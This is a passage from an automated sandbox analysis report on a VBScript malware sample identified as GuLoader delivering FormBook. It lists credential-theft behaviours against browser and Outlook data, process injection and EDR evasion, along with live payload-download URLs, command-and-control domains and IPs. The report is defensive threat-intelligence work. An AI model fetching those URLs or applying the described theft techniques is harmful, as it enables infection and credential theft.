          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3467347887.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.3468043368.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3185715994.0000000021E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3186142733.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3467347887.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.3468043368.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3185715994.0000000021E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3186142733.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information321
          Scripting          		Valid Accounts1
          Windows Management Instrumentation          		321
          Scripting          		1
          Abuse Elevation Control Mechanism          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		LSASS Memory114
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter          		Logon Script (Windows)512
          Process Injection          		3
          Obfuscated Files or Information          		Security Account Manager121
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          PowerShell          		Login HookLogin Hook1
          Software Packing          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput Capture3
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Masquerading          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
          Virtualization/Sandbox Evasion          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job512
          Process Injection          		Proc Filesystem1
          System Network Configuration Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1539343 Sample: 6 654398.vbs Startdate: 22/10/2024 Architecture: WINDOWS Score: 100 41 www.groupriam.com 2->41 43 gormezl_6777.6777.6777.677e 2->43 45 2 other IPs or domains 2->45 59 Malicious sample detected (through community Yara rule) 2->59 61 Multi AV Scanner detection for submitted file 2->61 63 Yara detected FormBook 2->63 65 6 other signatures 2->65 10 powershell.exe 18 2->10         started        13 wscript.exe 1 2->13         started        signatures3 process4 signatures5 73 Early bird code injection technique detected 10->73 75 Writes to foreign memory regions 10->75 77 Found suspicious powershell code related to unpacking or dynamic code loading 10->77 79 Queues an APC in another process (thread injection) 10->79 15 msiexec.exe 6 10->15         started        18 conhost.exe 10->18         started        81 VBScript performs obfuscated calls to suspicious functions 13->81 83 Suspicious powershell command line found 13->83 85 Wscript starts Powershell (via cmd or directly) 13->85 87 3 other signatures 13->87 20 powershell.exe 14 18 13->20         started        23 PING.EXE 1 13->23         started        process6 dnsIp7 89 Maps a DLL or memory area into another process 15->89 25 GJFjqeGumqI.exe 15->25 injected 49 groupriam.com 199.103.62.205, 443, 49718, 49988 CIRRUSTECHLTDCA Canada 20->49 91 Found suspicious powershell code related to unpacking or dynamic code loading 20->91 28 conhost.exe 20->28         started        30 conhost.exe 23->30         started        signatures8 process9 signatures10 69 Maps a DLL or memory area into another process 25->69 71 Found direct / indirect Syscall (likely to bypass EDR) 25->71 32 cmdkey.exe 13 25->32         started        process11 signatures12 51 Tries to steal Mail credentials (via file / registry access) 32->51 53 Tries to harvest and steal browser information (history, passwords, etc) 32->53 55 Modifies the context of a thread in another process (thread injection) 32->55 57 2 other signatures 32->57 35 GJFjqeGumqI.exe 32->35 injected 39 firefox.exe 32->39         started        process13 dnsIp14 47 www.foundation-repair.biz 199.59.243.227, 50003, 80 BODIS-NJUS United States 35->47 67 Found direct / indirect Syscall (likely to bypass EDR) 35->67 signatures15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          6 654398.vbs18%ReversingLabsScript-WScript.Trojan.Guloader

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          https://aka.ms/pscore6lB0%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          https://aka.ms/pscore680%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          groupriam.com
          		199.103.62.205
          		truefalse
            		unknown
            www.foundation-repair.biz
            		199.59.243.227
            		truefalse
              		unknown
              gormezl_6777.6777.6777.677e
              		unknown
              		unknowntrue
                		unknown
                www.groupriam.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://www.groupriam.com/zkwqTJp58.binfalse
                    		unknown
                    http://www.foundation-repair.biz/enra/?mxv=bBN4&XFtPf6=EuJScojaXV9tkcwLe9A6ZNdie4KkCxAOd2jPPlI8uN15nuMsourZ6RcE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzR3lGN8BbnO4B13xmkasr+DtvmANIh/JvA8i/3xstHKmsaw==false
                      		unknown
                      https://www.groupriam.com/Koalitioner.prxfalse
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabcmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2374208348.0000019E36F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.groupriam.com/zkwqTJp58.binTmsiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://www.groupriam.compowershell.exe, 00000004.00000002.2329009817.0000019E27116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://duckduckgo.com/ac/?q=cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.groupriam.com/zkwqTJp58.binZmsiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://promenter.rs/Koalitioner.prxpowershell.exe, 00000004.00000002.2329009817.0000019E27116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://www.groupriam.compowershell.exe, 00000004.00000002.2329009817.0000019E28C6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://go.micropowershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contoso.com/Licensepowershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contoso.com/Iconpowershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.groupriam.com/L_ymsiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://www.ecosia.org/newtab/cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://groupriam.compowershell.exe, 00000004.00000002.2329009817.0000019E28C6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://crl.microRpowershell.exe, 00000006.00000002.2657649363.00000000075B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://www.groupriam.com/zkwqTJp58.binUnwesJaebruta.pl/zkwqTJp58.binKrlgsBrdpromenter.rs/zkwqTJp58.msiexec.exe, 0000000A.00000002.3171643157.00000000067E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://ac.ecosia.org/autocomplete?q=cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.google.comcmdkey.exe, 0000000C.00000002.3468867917.0000000003FE4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3470326587.00000000064E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://www.groupriam.com/zkwqTJp58.bin3msiexec.exe, 0000000A.00000003.3126476457.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3167761730.0000000000A6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2624423621.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://contoso.com/powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2374208348.0000019E36F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://bruta.pl/Koalitioner.prxpowershell.exe, 00000004.00000002.2329009817.0000019E27116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://aka.ms/pscore68powershell.exe, 00000004.00000002.2329009817.0000019E26EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2329009817.0000019E26EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2624423621.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.groupriam.com/$_Qmsiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      199.103.62.205
                                                      		groupriam.comCanada
                                                      		36218CIRRUSTECHLTDCAfalse
                                                      199.59.243.227
                                                      		www.foundation-repair.bizUnited States
                                                      		395082BODIS-NJUSfalse

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1539343
                                                      Start date and time:2024-10-22 15:30:09 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 9m 11s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:13
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:6 654398.vbs
                                                      renamed because original name is a hash value
                                                      Original Sample Name: 654398.vbs
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.expl.evad.winVBS@15/8@3/2
                                                      EGA Information:
                                                      • Successful, ratio: 25%
                                                      HCA Information:
                                                      • Successful, ratio: 84%
                                                      • Number of executed functions: 83
                                                      • Number of non-executed functions: 273
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .vbs

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target GJFjqeGumqI.exe, PID 616 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 6656 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 7156 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: 6 654398.vbs

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      09:31:18API Interceptor79x Sleep call for process: powershell.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      199.103.62.205Scanned_22C-6e24090516030.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                        ImBm40hNZ2.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          02_deb64ed.bin.exeGet hashmaliciousGuLoaderBrowse
                                                            Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                              Richiesta di Offerta - Catalogo Campione.vbsGet hashmaliciousGuLoaderBrowse
                                                                #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  Anfrage f#U00fcr ein Angebot - Musterkatalog.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    47#U0627.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      199.59.243.227Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                      • www.9net88.net/ge07/?Qzr=Llspyx1H8n00&anM=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22uj/DqErob1VpJkZnQ==
                                                                      zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                                                      • www.gold-rates.online/rod1/
                                                                      PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                      • www.rebel.tienda/7n9v/
                                                                      rHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                                                      • www.donante-de-ovulos.biz/g3wl/
                                                                      Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                                      • www.online-dating28.xyz/xl8n/
                                                                      Re property pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • www.662-home-nb.shop/axh7/
                                                                      #U8a02#U55ae#U63cf#U8ff0.vbsGet hashmaliciousFormBookBrowse
                                                                      • www.notepad.mobi/4q0m/
                                                                      jOAcln1aPL.exeGet hashmaliciousUnknownBrowse
                                                                      • hb-drye.com/cpanel/panel/uploads/Jpnisg.pdf
                                                                      jOAcln1aPL.exeGet hashmaliciousUnknownBrowse
                                                                      • hb-drye.com/cpanel/panel/uploads/Jpnisg.pdf
                                                                      890927362736.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                      • www.virtu.industries/i9b0/

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      www.foundation-repair.bizImBm40hNZ2.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 199.59.243.227
                                                                      Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 199.59.243.226
                                                                      SecuriteInfo.com.Script.SNH-gen.5224.29912.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.59.243.226
                                                                      Paul Meeting Proposal and Schedule.xlsGet hashmaliciousFormBookBrowse
                                                                      • 199.59.243.226
                                                                      Paul Agrotis List.xlsGet hashmaliciousFormBookBrowse
                                                                      • 199.59.243.226
                                                                      #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 199.59.243.226
                                                                      Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 199.59.243.226

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      BODIS-NJUSInvoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.59.243.227
                                                                      zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                                                      • 199.59.243.227
                                                                      PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                      • 199.59.243.227
                                                                      rHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.59.243.227
                                                                      Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.59.243.227
                                                                      Re property pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.59.243.227
                                                                      #U8a02#U55ae#U63cf#U8ff0.vbsGet hashmaliciousFormBookBrowse
                                                                      • 199.59.243.227
                                                                      Document.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                      • 199.59.243.227
                                                                      jOAcln1aPL.exeGet hashmaliciousUnknownBrowse
                                                                      • 199.59.243.227
                                                                      jOAcln1aPL.exeGet hashmaliciousUnknownBrowse
                                                                      • 199.59.243.227
                                                                      CIRRUSTECHLTDCAScanned_22C-6e24090516030.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 199.103.62.205
                                                                      ImBm40hNZ2.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 199.103.62.205
                                                                      02_deb64ed.bin.exeGet hashmaliciousGuLoaderBrowse
                                                                      • 199.103.62.205
                                                                      Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 199.103.62.205
                                                                      Richiesta di Offerta - Catalogo Campione.vbsGet hashmaliciousGuLoaderBrowse
                                                                      • 199.103.62.205
                                                                      #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 199.103.62.205
                                                                      Anfrage f#U00fcr ein Angebot - Musterkatalog.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 199.103.62.205
                                                                      47#U0627.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 199.103.62.205
                                                                      g5oo6DQ4pd.exeGet hashmaliciousUnknownBrowse
                                                                      • 208.69.57.105
                                                                      OQchDohurA.exeGet hashmaliciousRaccoon SmokeLoaderBrowse
